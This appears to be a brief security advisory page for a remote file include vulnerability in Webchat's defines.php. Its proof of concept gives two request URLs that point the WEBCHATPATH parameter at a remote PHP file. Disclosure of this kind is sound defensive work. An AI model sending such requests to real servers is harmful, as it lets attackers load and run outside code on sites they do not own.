Webchat Defines.PHP Remote File Include Vulnerability

info
discussion
exploit
solution
references

Webchat Defines.PHP Remote File Include Vulnerability

The following proof of concept was provided:

http://www.example.com/defines.php?WEBCHATPATH=http://www.target.com/db_mysql.php http://www.example.com/defines.php?WEBCHATPATH=http://www.target.com/language/english.php